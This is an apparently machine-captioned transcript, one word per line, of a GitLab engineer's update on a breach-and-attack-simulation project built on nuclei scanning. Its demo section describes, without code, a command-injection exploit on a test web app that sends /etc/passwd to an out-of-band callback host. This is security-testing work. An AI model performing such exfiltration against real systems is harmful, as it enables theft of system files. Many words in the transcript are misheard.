►
Description
Hi y'all it's Erran Carey kicking off Black History Month with a showcase of Breach and Attack Simulation (BAS) Single-Engineer Group progress from January.
I've been working with the Threat Insights, Dynamic Analysis, and Vulnerability Research teams.
Check for written updates in this GitLab issue: https://gitlab.com/gitlab-org/incubation-engineering/breach-and-attack-simulation/meta/-/issues/1
A
A
So
what
is
breach
attack
simulation
assuming
you
have
no
prior
knowledge
of
the
stock
simulation.
A
We
can
consider
Bridge
attack
simulation
to
be
a
security
testing
method
for
validating
application
and
Point
Security
controls
that
includes
things
like
Relic
running
web
applications,
where
you're
running
maybe
Ruby
on
Rails
application
or
PHP
application,
or
if
you
have
an
endpoint
deployed
where
you
actually
deploy
inside
of
a
Docker
container
or
you
deploy
inside
of
AWS
ec2
instance,
any
type
of
infrastructure
you're
deploying
to
being
able
to
test
the
different
security
controls
on
that
to
make
sure
your
operating
system.
A
Your
actual
application
that
you're
running
on
top
of
that
are
running
in
a
secure
manner.
Boss
differentiates
itself
from
things
like
Dynamic
analysis,
because
it's
more
as
opposed
to
looking
at
purely
the
application
side.
Bass
is
focusing
on
whether
you
can
actually
exploit
a
particular
vulnerability.
So
for
vulnerability,
it's
been
detected
by
a
dast
scanner.
You'd
typically
take
that
report.
If
you're
a
penetration,
tester
or
a
red,
teamer
you'd
actually
go
through
and
test
hey.
Are
there
any
mitigations
in
place
or
can
I
actually
exploit
this
vulnerability?
A
In
some
way,
were
you
able
to
take
those
vulnerability
tools
and
then,
on
top
of
that,
adding
the
ability
for
attacker
techniques
and
use
simulating
those
attacker
techniques
as
part
of
that
life
cycle,
so
that
can
be
through
gitlab
Ci
or
it
could
potentially
be
other
things
similar
to
how
we
run
the
kubernetes
agent,
for
example,
where
we
can
have
continuous
testing
and
breach
and
attack
simulation
against
the
mitigations
you've
been
in
place
for
vulnerabilities
you've
detected
previous
in
a
prior
part
of
your
security
testing
cycle.
A
The
goals
for
this
are
essentially
to
curate
attack
scenarios,
so
we
want
to
be
able
to
create
a
inventory
of
different
attack
techniques
that
are
being
used
similar.
If
you
look
at
the
meter
attack
framework,
it
sort
of
enumerates
all
various
techniques
that
can
be
used
by
attackers,
and
on
top
of
that,
it's
sort
of
picking
and
choosing
which
one
of
those
are
going
to
be
efficient
at
testing
security
controls
in
our
place.
A
A
On
top
of
that,
I've
been
going
ahead
and
collaborating
so
the
bridge
and
stock
simulation
tag
has
been
welcomed
with
open
arms
in
gitlab,
it's
been
pretty
fun.
I've
been
working
with
the
threat
insights
to
even
govern
in
terms
of
vulnerability,
dashboards
and
creating
a
generic
reports
for
Bass
and
adding
on
my
existing
the
existing
capabilities,
I've
created
with
the
nuclear
analyzer,
where
I'm
able
to
integrate
directly
into
the
existing
reports.
A
Through
what
threat
insights
have
provided
me,
the
dynamic
analysis
team
has
been
super
helpful
I've
been
collaborating
with
them
quite
a
lot
on
how
I
display
vulnerabilities
and
exploit
information
and
then
vulnerability.
Research
has
been
super
helpful
in
terms
of
how
I've
been
planning
my
Approach
at
creating
these
different
exploits
and
even
injecting
custom
exploit
payloads
and,
on
top
of
things
like
active
checks
that
Dost
supports.
A
So
next
I'll
throw
a
jump
right
into
a
demo
of
some
of
the
existing
functionality.
That's
been
deployed.
A
So
if
I
go
to
this
nuclei
templates
job
that
I've
created,
we
can
see
that
it's
using
my
custom
nuclei,
analyzer
Docker
image
and
this
nuclear
nuclei
analyzer.
What
this
is
is
a
custom
scanner,
which
is
a
compliance
with
the
gitlab
security
report
format.
So
this
is
a
generic
format
that
you
can
use
for
any
security
tool
as
long
as
you
export
and
then
so.
A
A
nuclei
export
the
Json
lines
report
from
nuclei
and
I'm
able
to
take
that
and
import
it
into
gitlab
by
running
this
nuclei,
analyzer
Tool,
to
get
it
into
the
appropriate
formats.
I've
updated
this
to
recently.
It's
include
the
request
and
response
information,
as
well
as
adding
the
ability
to
use
the
interact,
sh
extension
for
nuclei,
so
that
integration
for
nuclei
actually
goes
ahead
and
provides
using
the
interact.sh
service
it
tests
for
out-of-bound
connections.
A
So
it
will
dynamically
provision
a
unique
payload
against
OST
dot
me
and
Os
dot
me
well,
that
will
do.
Is
it's
a
unique
payload
and
that
unique
payload
I
inject
into
the
template
using
a
custom
nuclei
template
and
that
payload
will
actually
in
the
command
injection
portion.
They'll
actually
have
a
callback
to
that
unique
payload
against
the
the
interact,
sh
server,
and
so
doing
this
I'm
able
to
go
ahead
and
add
some
additional
details
into
the
vulnerability
report.
A
So
if
I
come
here,
we
can
see
that
we
have
these.
This
DVD
downloadable
web
app
command
injection
vulnerability.
If
we
look
at
that,
we
can
see
here's
our
existing
information
that
we
get
in
any
type
of
Dos
report.
A
But
on
the
evidence
section
we
can
see
that
I've
injected
you're
using
thread
inside
generic
report
format.
We
can
see
that
I've
done
a
post
request
to
interact
sh
and
I've
included
the
contents
of
etsy
password
just
to
prove
that
I
was
able
to
read
a
file
off
the
file
system.
Through
my
exploits
that
I
provided
and
then
we
can
see
here
that
interact.
Sh
responded
with
this
custom
payload,
which
allows
me
to
verify
that
in
this
job,
I
was
able
to
get
that
callbacks
end-to-end
out
of
bound
testing
being
done
here.
A
So
you
can
see
here,
there's
a
payload
which
I'm
using
that
custom.
That's
for
IP
in
this
command
injection
the
way
I've
structured
the
exploit
is
for
Ping.
It
will
operate
again
still
do
a
DNS
request
against
the
host
name
and
then
on
top
of
that
I've
injected
some
custom
PHP,
which
we'll
go
ahead
and
actually
do
a
post
request,
including
the
contents
of
etsy
password
and
so
doing
that
I'm
able
to
validate
that
we've
got
these
additional
details.
A
A
So
I've
created
a
custom,
namespace
called
nuclei
template,
so
so
there's
no
collisions
with
existing
templates
and
dust,
and
so
what
what
I
intend
to
do
is
have
customers
start
adding
this
additional
jaw
bin,
where
they're,
adding
an
additional
Dash
report
artifact,
which
will
amend
or
append
to
the
end
of
their
dosed
report,
so
they'll
see
event
vulnerabilities
from
nuclei
on
top
of
their
existing
vulnerabilities,
which
I
think
will
be
quite
good.
There's
some
templates
in
nuclei
that
I
want
to
add
around
command
injection.
A
Were
we
take
more
active
approach
and
I've
already
talked
to
the
dynamic
analysis
team
for
having
them
come
on
board
and
start
using
the
interact.sh,
whether
it's
self-hosted
or
creating
a
our
own
command
server
for
proving
out
of
band
connections.
A
Appendix
there's
the
links
to
the
handbook
issues
and
the
new
nuclei
analyzer
custom
scanner
for
dust,
which
is
adding
some
region
attack
simulation
capabilities.
A
If
we
look
at
the
handbook
page,
we
can
see
the
product
affinity
and
we
can
see
a
list
here
of
the
jobs
to
be
done
where
I
go
through
different
attacks
scenarios
that
we
want
to
be
capturing
and
in
terms
of
metrics,
very
much
want
to
look
at
I
noticed
that
there's
a
new
guy
action,
that's
been
created
recently
for
gitlab
actions,
GitHub
actions
and
so
with
GitHub
actions.